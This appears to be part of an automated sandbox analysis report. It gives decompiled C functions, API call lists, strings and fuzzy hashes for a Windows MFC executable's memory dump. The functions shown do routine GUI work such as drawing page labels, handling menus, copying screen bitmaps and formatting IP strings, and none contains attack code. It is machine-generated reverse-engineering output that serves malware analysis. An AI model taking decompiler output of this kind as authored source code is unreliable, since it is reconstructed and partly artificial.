Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2566$#4083DrawEdge$#2864Parent
String ID:
API String ID: 2792232749-0
Opcode ID: 525ef626595c81062ff291b8d8143be4fc661b9527e6a08dca739678f8d56de9
Instruction ID: 95a3676bf7e8de789e7bbfb8f7632d5fd2f4affc349cfe17065ab4213de9fcc2
Opcode Fuzzy Hash: 525ef626595c81062ff291b8d8143be4fc661b9527e6a08dca739678f8d56de9
Instruction Fuzzy Hash: BB31B6713403547FEA30AF69DC49F6B7798EB84710F014429FA85EB1E1CAA0AC409B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC00, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041EC00(void* __ecx) {
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr* _t61;
				void* _t66;
				void* _t67;
				void* _t68;
				intOrPtr _t72;
				void* _t90;
				void* _t91;
				void* _t95;
				intOrPtr* _t97;
				void* _t99;

				L004269E6();
				_t68 = __ecx;
				asm("movsd");
				_t72 =  *((intOrPtr*)(__ecx + 0x30));
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t97 =  *((intOrPtr*)(_t99 + 8));
				_t90 = _t72 + _t72;
				_t48 =  *((intOrPtr*)(_t99 - 0x24)) - _t90;
				 *((intOrPtr*)(_t99 - 0x2c)) = _t48;
				 *((intOrPtr*)(_t99 - 0x10)) = _t48;
				 *((intOrPtr*)(_t99 - 0x24)) = _t72 + _t48 + 2;
				L004266F0();
				L004266EA();
				_t51 =  *((intOrPtr*)(_t99 - 0x2c)) + 1;
				 *((intOrPtr*)(_t99 - 0x10)) = _t51;
				L004266F0();
				L004266EA();
				_t54 =  *((intOrPtr*)(_t99 - 0x2c)) + 2;
				 *((intOrPtr*)(_t99 - 0x10)) = _t54;
				L004266F0();
				L004266EA();
				L00425E08();
				 *(_t99 - 4) = 0;
				asm("cdq");
				OffsetRect(_t99 - 0x30, 0,  *((intOrPtr*)(__ecx + 0x30)) - _t90 >> 1);
				_t61 =  *((intOrPtr*)(_t99 + 0xc));
				L00425FDC();
				 *((intOrPtr*)( *_t97 + 0x70))( *((intOrPtr*)(_t99 + 8)), 0xffffffff, _t99 - 0x30, 0x926, _t99 + 8, "Page %d - %d",  *((intOrPtr*)(_t61 + 0x14)),  *( *((intOrPtr*)( *_t61 + 0x60)) + 0x1e) & 0x0000ffff,  *((intOrPtr*)(__ecx + 0x28)),  *((intOrPtr*)(_t99 - 0x10)), _t99 - 0x20, 0, _t54,  *((intOrPtr*)(__ecx + 0x28)),  *((intOrPtr*)(_t99 - 0x10)), _t99 - 0x18, 0, _t51,  *((intOrPtr*)(__ecx + 0x28)),  *((intOrPtr*)(_t99 - 0x10)), _t99 - 0x18, 0, _t48, _t91, _t95, _t67);
				 *(_t99 - 0x30) = 0;
				_t66 =  *((intOrPtr*)( *_t97 + 0x70))( *((intOrPtr*)(_t68 + 8)), 0xffffffff, _t99 - 0x30, 0x924);
				 *(_t99 - 4) =  *(_t99 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return _t66;
			}

0x0041ec05
0x0041ec0e
0x0041ec18
0x0041ec19
0x0041ec1c
0x0041ec1d
0x0041ec21
0x0041ec22
0x0041ec25
0x0041ec2c
0x0041ec2e
0x0041ec31
0x0041ec3c
0x0041ec43
0x0041ec50
0x0041ec5a
0x0041ec5b
0x0041ec64
0x0041ec71
0x0041ec7b
0x0041ec7e
0x0041ec87
0x0041ec94
0x0041ec9c
0x0041eca4
0x0041eca7
0x0041ecb2
0x0041ecb8
0x0041ecd1
0x0041eceb
0x0041ed01
0x0041ed04
0x0041ed07
0x0041ed0e
0x0041ed19
0x0041ed21

APIs

_EH_prolog.MSVCRT ref: 0041EC05
#4297.MFC42(?,00000000,?), ref: 0041EC43
#4133.MFC42(?,?,?,00000000,?), ref: 0041EC50
#4297.MFC42(?,00000000,?,?,?,?,00000000,?), ref: 0041EC64
#4133.MFC42(?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EC71
#4297.MFC42(?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EC87
#4133.MFC42(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EC94
#540.MFC42(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000,?), ref: 0041EC9C
OffsetRect.USER32(?,00000000,?), ref: 0041ECB2
#2818.MFC42(?,Page %d - %d,?,?), ref: 0041ECD1
#800.MFC42 ref: 0041ED0E

Strings

Page %d - %d, xrefs: 0041ECCB

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297$#2818#540#800H_prologOffsetRect
String ID: Page %d - %d
API String ID: 3701434173-223698169
Opcode ID: d504357b8f8eacf7c71ba79029160e69624bc946d1f19ba00d0c8de08889b579
Instruction ID: c1ef0b3f4b7d40d27f1e78059951b78c8938a277021bd3f49d4197831584f594
Opcode Fuzzy Hash: d504357b8f8eacf7c71ba79029160e69624bc946d1f19ba00d0c8de08889b579
Instruction Fuzzy Hash: 87416DB1A00129AFCF04DF95DC95CEEBBB9FF48314B51425EF816AB291DB70A901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041550D, Relevance: 21.1, APIs: 14, Instructions: 107
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041550D(intOrPtr __ecx, void* __fp0) {
				struct HWND__* _t41;
				signed int _t42;
				int _t45;
				int _t46;
				intOrPtr _t70;
				intOrPtr _t73;
				int _t75;
				void* _t76;
				void* _t91;

				_t91 = __fp0;
				L004269E6();
				_t70 = __ecx;
				 *((intOrPtr*)(_t76 - 0x14)) = 0;
				L004262EE();
				 *(_t76 - 4) = 0;
				_t41 = L00401307();
				if(_t41 == 0) {
					_t41 = GetDesktopWindow();
					_push(_t41);
					L00426372();
				}
				_push(0xe800);
				_push(0x50002800);
				_push(_t41);
				L004266D8();
				_t42 =  *(_t76 + 8) & 0x0000ffff;
				_push(_t42);
				L00426336();
				if(_t42 == 0) {
					L13:
					 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
					L004262E2();
					 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
					return  *((intOrPtr*)(_t76 - 0x14));
				}
				L00425F8E();
				_t73 = 1;
				 *(_t76 - 4) = 1;
				_push(_t73);
				_push(_t73);
				_push(0xff);
				_push( *0x440d0c);
				_push( *0x440d08);
				L00426000();
				_t45 = E00401140(_t70, _t91, _t76 - 0x20,  *(_t76 + 8));
				if(_t45 == 0) {
					L12:
					 *(_t76 - 4) = 0;
					L00425FB2();
					goto L13;
				}
				 *((intOrPtr*)(_t76 - 0x14)) = _t73;
				 *(_t76 + 8) = 0;
				if( *((intOrPtr*)(_t76 - 0x68)) <= 0) {
					goto L12;
				} else {
					goto L5;
				}
				do {
					L5:
					_push( *(_t76 + 8));
					L004266D2();
					 *(_t76 - 0x10) = _t45;
					if(_t45 != 0) {
						_t46 = GetMenuState( *(_t70 + 4), _t45, 0);
						if(_t46 != 0xffffffff) {
							_push( *(_t76 - 0x10));
							L004266CC();
							_t75 = _t46;
							if(_t75 >= 0) {
								_push(_t76 - 0x18);
								_push(_t76 - 0x24);
								_push(_t76 - 0x10);
								_push(_t75);
								L004266C6();
								if( *(_t76 - 0x18) > 0) {
									_t75 =  *(_t76 - 0x18);
								}
							}
							L00401D9D(_t70, 0,  *(_t76 - 0x10), _t76 - 0x20, _t75);
						}
					}
					 *(_t76 + 8) =  *(_t76 + 8) + 1;
					_t45 =  *(_t76 + 8);
				} while (_t45 <  *((intOrPtr*)(_t76 - 0x68)));
				goto L12;
			}

0x0041550d
0x00415512
0x0041551f
0x00415529
0x0041552c
0x00415531
0x00415534
0x0041553b
0x0041553d
0x00415543
0x00415544
0x00415544
0x00415549
0x0041554e
0x00415553
0x0041555a
0x0041555f
0x00415563
0x0041556a
0x00415571
0x0041563f
0x0041563f
0x00415649
0x00415656
0x0041565e
0x0041565e
0x0041557b
0x00415585
0x00415586
0x0041558a
0x0041558b
0x0041558c
0x00415591
0x00415597
0x0041559d
0x004155ab
0x004155b2
0x00415633
0x00415636
0x00415639
0x00000000
0x0041563e
0x004155b7
0x004155ba
0x004155bd
0x00000000
0x00000000
0x00000000
0x00000000
0x004155bf
0x004155bf
0x004155bf
0x004155c8
0x004155cf
0x004155d2
0x004155d9
0x004155e2
0x004155e4
0x004155ed
0x004155f2
0x004155f6
0x00415601
0x00415605
0x00415609
0x0041560a
0x0041560b
0x00415613
0x00415615
0x00415615
0x00415613
0x00415623
0x00415623
0x004155e2
0x00415628
0x0041562b
0x0041562e
0x00000000

APIs

_EH_prolog.MSVCRT ref: 00415512
#554.MFC42 ref: 0041552C
GetDesktopWindow.USER32 ref: 0041553D
#2864.MFC42(00000000), ref: 00415544
#2120.MFC42(00000000,50002800,0000E800), ref: 0041555A
#4163.MFC42(?,00000000,50002800,0000E800), ref: 0041556A
#384.MFC42(?,?,00000000,50002800,0000E800), ref: 0041557B
#2096.MFC42(000000FF,00000001,00000001,?,?,00000000,50002800,0000E800), ref: 0041559D
#3289.MFC42(?,000000FF,00000001,00000001,?,?,00000000,50002800,0000E800), ref: 004155C8
GetMenuState.USER32 ref: 004155D9
#2012.MFC42(?,?,?,00000000,50002800,0000E800), ref: 004155ED
#2920.MFC42(00000000,?,?,?,?,?,?,00000000,50002800,0000E800), ref: 0041560B
#686.MFC42(000000FF,00000001,00000001,?,?,00000000,50002800,0000E800), ref: 00415639
#807.MFC42(?,00000000,50002800,0000E800), ref: 00415649

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2012#2096#2120#2864#2920#3289#384#4163#554#686#807DesktopH_prologMenuStateWindow
String ID:
API String ID: 577007885-0
Opcode ID: f476e397ff565bcff6725b31b2459322a797d793f862318b20a2136ff8ad7648
Instruction ID: eb5594da060ff42b4f2a8cbd6c29204c7730d8f3c6820adc5771d80721ee1510
Opcode Fuzzy Hash: f476e397ff565bcff6725b31b2459322a797d793f862318b20a2136ff8ad7648
Instruction Fuzzy Hash: 8C418D71901129EACF10EF91DD91EEEBB79FF44304F50016BF505A2191DB389A88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401541, Relevance: 21.1, APIs: 14, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401541(void* __ecx) {
				void* _t40;
				intOrPtr _t41;
				int _t48;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				void* _t73;

				L004269E6();
				_t71 = __ecx;
				_push(__ecx);
				L00426558();
				 *(_t73 - 4) = 0;
				L004264B0();
				 *(_t73 - 4) = 1;
				asm("sbb eax, eax");
				_push(CreateCompatibleDC( ~(_t73 - 0x80) &  *(_t73 - 0x7c)));
				L004264AA();
				_t40 = __ecx + 0x4c;
				if(_t40 != 0) {
					_t41 =  *((intOrPtr*)(_t40 + 4));
				} else {
					_t41 = 0;
				}
				_push(_t41);
				_push( *(_t73 - 0x18));
				L00426540();
				_t67 = _t41;
				if((GetDeviceCaps( *(_t73 - 0x78), 0x26) & 0x00000001) != 0 &&  *((intOrPtr*)(_t71 + 0x58)) != 0) {
					_push(0);
					_push(_t71 + 0x54);
					L00426810();
					RealizePalette( *(_t73 - 0x7c));
				}
				GetWindowRect( *(_t71 + 0x20), _t73 - 0x2c);
				asm("sbb eax, eax");
				_t48 = BitBlt( *(_t73 - 0x7c), 0, 0,  *((intOrPtr*)(_t73 - 0x24)) -  *(_t73 - 0x2c),  *((intOrPtr*)(_t73 - 0x20)) -  *((intOrPtr*)(_t73 - 0x28)),  ~(_t73 - 0x1c) &  *(_t73 - 0x18), 0, 0, 0xcc0020);
				if(_t67 != 0) {
					_t68 =  *((intOrPtr*)(_t67 + 4));
				} else {
					_t68 = 0;
				}
				_push(_t68);
				_push( *(_t73 - 0x18));
				L00426540();
				 *(_t73 - 4) = 0;
				L0042649E();
				 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
				L00426552();
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return _t48;
			}

0x00420bf3
0x00420bfd
0x00420c00
0x00420c04
0x00420c0e
0x00420c11
0x00420c19
0x00420c1f
0x00420c2b
0x00420c2f
0x00420c34
0x00420c39
0x00420c3f
0x00420c3b
0x00420c3b
0x00420c3b
0x00420c42
0x00420c43
0x00420c46
0x00420c4d
0x00420c5b
0x00420c65
0x00420c66
0x00420c6a
0x00420c72
0x00420c72
0x00420c7f
0x00420c9b
0x00420caa
0x00420cb2
0x00420cb8
0x00420cb4
0x00420cb4
0x00420cb4
0x00420cbb
0x00420cbc
0x00420cbf
0x00420cc7
0x00420cca
0x00420ccf
0x00420cd6
0x00420ce1
0x00420ce9

APIs

_EH_prolog.MSVCRT ref: 00420BF3
#470.MFC42 ref: 00420C04
#323.MFC42 ref: 00420C11
CreateCompatibleDC.GDI32(?), ref: 00420C25
#1640.MFC42(00000000), ref: 00420C2F
#5785.MFC42(?,?,00000000), ref: 00420C46
GetDeviceCaps.GDI32(?,00000026), ref: 00420C52
#5791.MFC42(?,00000000), ref: 00420C6A
RealizePalette.GDI32(?), ref: 00420C72
GetWindowRect.USER32 ref: 00420C7F
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00420CAA
#5785.MFC42(?,?), ref: 00420CBF
#640.MFC42(?,?), ref: 00420CCA
#755.MFC42(?,?), ref: 00420CD6

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785$#1640#323#470#5791#640#755CapsCompatibleCreateDeviceH_prologPaletteRealizeRectWindow
String ID:
API String ID: 1885752197-0
Opcode ID: 4d3b5cf71b303f060b8ac8370d5f5980091f29be10c7262a5770b915400515cc
Instruction ID: 982a31cf2f624f53cf94181ef0078a0459bd82ac1ead66a3c5ab922d543551f0
Opcode Fuzzy Hash: 4d3b5cf71b303f060b8ac8370d5f5980091f29be10c7262a5770b915400515cc
Instruction Fuzzy Hash: AA3174B1A00169AFDB14DFA5EC85DFEBB78FF44308F51412AE512A3151DB38AD45CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004013A7, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004013A7(void* __ecx) {
				void* _t32;
				void* _t37;
				intOrPtr _t56;
				void* _t58;

				L004269E6();
				 *((intOrPtr*)(_t58 - 0x18)) = 0;
				L00425E08();
				_t56 = 1;
				 *((intOrPtr*)(_t58 - 4)) = _t56;
				if(SendMessageA( *(__ecx + 0xb0), 0x469, 0, 0) == 0) {
					_push(_t58 - 0xd);
					_push(_t58 - 0xe);
					_push(_t58 - 0xf);
					_t32 = _t58 - 0x10;
					_push(_t32);
					L00426258();
					if(_t32 == 4) {
						_t37 = _t58 - 0x14;
						L00425FDC();
						__imp___mbscmp( *((intOrPtr*)(_t58 - 0x14)), "0.0.0.0", _t37, "%d.%d.%d.%d",  *(_t58 - 0x10) & 0x000000ff,  *(_t58 - 0xf) & 0x000000ff,  *(_t58 - 0xe) & 0x000000ff,  *(_t58 - 0xd) & 0x000000ff);
						if(_t37 != 0) {
							_push(_t58 - 0x14);
							L0042611A();
						} else {
							_push(0x44216c);
							goto L7;
						}
					} else {
						_push(0x442168);
						L7:
						L00425FB8();
					}
					 *((intOrPtr*)(_t58 - 0x18)) = _t56;
				} else {
					_push(_t58 - 0x14);
					L0042611A();
					 *((intOrPtr*)(_t58 - 0x18)) = _t56;
				}
				 *((char*)(_t58 - 4)) = 0;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return  *((intOrPtr*)(_t58 + 8));
			}

0x0040bd7d
0x0040bd8f
0x0040bd92
0x0040bd99
0x0040bda1
0x0040bdb2
0x0040bdce
0x0040bdd2
0x0040bdd6
0x0040bdd7
0x0040bdda
0x0040bddb
0x0040bde3
0x0040be00
0x0040be09
0x0040be16
0x0040be21
0x0040be38
0x0040be39
0x0040be23
0x0040be23
0x00000000
0x0040be23
0x0040bde5
0x0040bde5
0x0040be28
0x0040be2b
0x0040be2b
0x0040be3e
0x0040bdb4
0x0040bdba
0x0040bdbb
0x0040bdc0
0x0040bdc0
0x0040be44
0x0040be47
0x0040be55
0x0040be5d

APIs

_EH_prolog.MSVCRT ref: 0040BD7D
#540.MFC42 ref: 0040BD92
SendMessageA.USER32 ref: 0040BDAA
#535.MFC42(?), ref: 0040BDBB
#6669.MFC42(?,?,?,?), ref: 0040BDDB
#537.MFC42(0044216C), ref: 0040BE2B
#800.MFC42(?), ref: 0040BE47

Strings

0.0.0.0, xrefs: 0040BE0E
%d.%d.%d.%d, xrefs: 0040BE03

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#537#540#6669#800H_prologMessageSend
String ID: %d.%d.%d.%d$0.0.0.0
API String ID: 2007123048-464342551
Opcode ID: 2707b27104adb6fd065ec47f20e58df5844608afe3d586410bb7a315a621c74d
Instruction ID: ecb164f9128d68005719b01a2867c75b454090b09fef68cffb4e2a168e0ff597
Opcode Fuzzy Hash: 2707b27104adb6fd065ec47f20e58df5844608afe3d586410bb7a315a621c74d
Instruction Fuzzy Hash: 07215372A00159AACB11DBD5D9859FFBB7CEF05704F50006BF205B2181DB789B44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C4E, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401C4E(void* __ecx) {
				void* _t32;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t61;

				L004269E6();
				_t61 = _t60 - 0x10;
				L00401F46(_t58 - 0x14);
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				_push(0x806d);
				L00425FB8();
				 *(_t58 - 4) = 1;
				L00425E08();
				_push("------------------------\n");
				 *(_t58 - 4) = 2;
				L004263BA();
				_t56 = 0;
				if(L00401023() > 0) {
					do {
						_push( *((intOrPtr*)(L004010B9(_t58 - 0x1c, _t56))));
						_t56 = _t56 + 1;
						 *(_t58 - 4) = 3;
						_push(_t56);
						_push("%d- %s\n");
						_push(_t58 - 0x18);
						L00425FDC();
						_t61 = _t61 + 0x10;
						 *(_t58 - 4) = 2;
						L00425DFC();
						_push(_t58 - 0x18);
						L004263B4();
					} while (_t56 < L00401023());
				}
				_push(0);
				_push(0);
				_push( *((intOrPtr*)(_t58 - 0x10)));
				L004263AE();
				 *(_t58 - 4) = 1;
				L00425DFC();
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				L00425DFC();
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				_t32 = E00401451(_t31, _t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t32;
			}

0x0040d4b1
0x0040d4b6
0x0040d4c0
0x0040d4c5
0x0040d4c9
0x0040d4d1
0x0040d4d9
0x0040d4dd
0x0040d4e2
0x0040d4ea
0x0040d4ee
0x0040d4f6
0x0040d4ff
0x0040d501
0x0040d50e
0x0040d510
0x0040d514
0x0040d518
0x0040d519
0x0040d51e
0x0040d51f
0x0040d524
0x0040d52a
0x0040d52e
0x0040d539
0x0040d53a
0x0040d547
0x0040d501
0x0040d54b
0x0040d54d
0x0040d54f
0x0040d554
0x0040d55c
0x0040d560
0x0040d565
0x0040d56c
0x0040d571
0x0040d578
0x0040d582
0x0040d58a

APIs

_EH_prolog.MSVCRT ref: 0040D4B1
#537.MFC42(0000806D), ref: 0040D4D1
#540.MFC42(0000806D), ref: 0040D4DD
#941.MFC42(------------------------,0000806D), ref: 0040D4EE
#2818.MFC42(?,%d- %s,00000001,00000000,0000806D,00000000,------------------------,0000806D), ref: 0040D51F
#800.MFC42(------------------------,0000806D), ref: 0040D52E
#939.MFC42(?,------------------------,0000806D), ref: 0040D53A
#4224.MFC42(?,00000000,00000000,------------------------,0000806D), ref: 0040D554
#800.MFC42(?,00000000,00000000,------------------------,0000806D), ref: 0040D560
#800.MFC42(?,00000000,00000000,------------------------,0000806D), ref: 0040D56C

Strings

------------------------, xrefs: 0040D4E2
%d- %s, xrefs: 0040D519

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2818#4224#537#540#939#941H_prolog
String ID: %d- %s$------------------------
API String ID: 2491675975-2154383963
Opcode ID: 4c3500ad9f9f5ab65960a2919d2e00e71d3329d7b58d23b23a71ed475a3248e0
Instruction ID: 05784886e934a1a5690a2efb9a1af031f2235592fcd640cb46d2b62beb450aa0
Opcode Fuzzy Hash: 4c3500ad9f9f5ab65960a2919d2e00e71d3329d7b58d23b23a71ed475a3248e0
Instruction Fuzzy Hash: FE21B031D00269AADB05F7E5C946BFEBB78AF10318F90006EE411731D2DB785B08C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4ED, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041E4ED() {
				int _t34;
				void* _t58;
				void* _t60;
				void* _t61;

				L004269E6();
				_t61 = _t60 - 0x1c;
				L00425E08();
				 *(_t58 - 4) = 0;
				L00425E44();
				 *((intOrPtr*)(_t58 - 0x18)) =  *0x00429B7A;
				L00425FCA();
				 *((intOrPtr*)(_t58 - 0x10)) = SendMessageA( *0x00429B96, 0x1200, 0, 0);
				_push( *((intOrPtr*)(_t58 - 0x10)));
				_t34 =  *( *(_t58 + 0xc));
				_push("Column Count");
				_push(_t34);
				L0042624C();
				 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
				if( *((intOrPtr*)(_t58 - 0x10)) > 0) {
					do {
						SendMessageA( *0x00429B96, 0x1207,  *(_t58 + 8), _t58 - 0x28);
						_push( *(_t58 + 8));
						_push("Column %i");
						_push(_t58 - 0x14);
						L00425FDC();
						_t61 = _t61 + 0xc;
						_push( *((intOrPtr*)(_t58 - 0x20)) -  *(_t58 - 0x28));
						_push( *((intOrPtr*)(_t58 - 0x14)));
						_push( *( *(_t58 + 0xc)));
						L0042624C();
						 *(_t58 + 8) =  *(_t58 + 8) + 1;
						_t34 =  *(_t58 + 8);
					} while (_t34 <  *((intOrPtr*)(_t58 - 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t34;
			}

0x0041e4f2
0x0041e4f7
0x0041e500
0x0041e507
0x0041e50a
0x0041e515
0x0041e518
0x0041e531
0x0041e537
0x0041e53c
0x0041e53e
0x0041e543
0x0041e544
0x0041e549
0x0041e551
0x0041e553
0x0041e562
0x0041e564
0x0041e570
0x0041e575
0x0041e576
0x0041e57e
0x0041e586
0x0041e587
0x0041e58a
0x0041e58b
0x0041e590
0x0041e593
0x0041e596
0x0041e553
0x0041e59b
0x0041e5a2
0x0041e5ad
0x0041e5b5

APIs

_EH_prolog.MSVCRT ref: 0041E4F2
#540.MFC42 ref: 0041E500
#1168.MFC42 ref: 0041E50A
#6696.MFC42 ref: 0041E518
SendMessageA.USER32 ref: 0041E52F
#6402.MFC42(?,Column Count,?), ref: 0041E544
SendMessageA.USER32 ref: 0041E562
#2818.MFC42(?,Column %i,00000000), ref: 0041E576
#6402.MFC42(?,?,?), ref: 0041E58B
#800.MFC42(?,Column Count,?), ref: 0041E5A2

Strings

Column Count, xrefs: 0041E53E
Column %i, xrefs: 0041E570

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
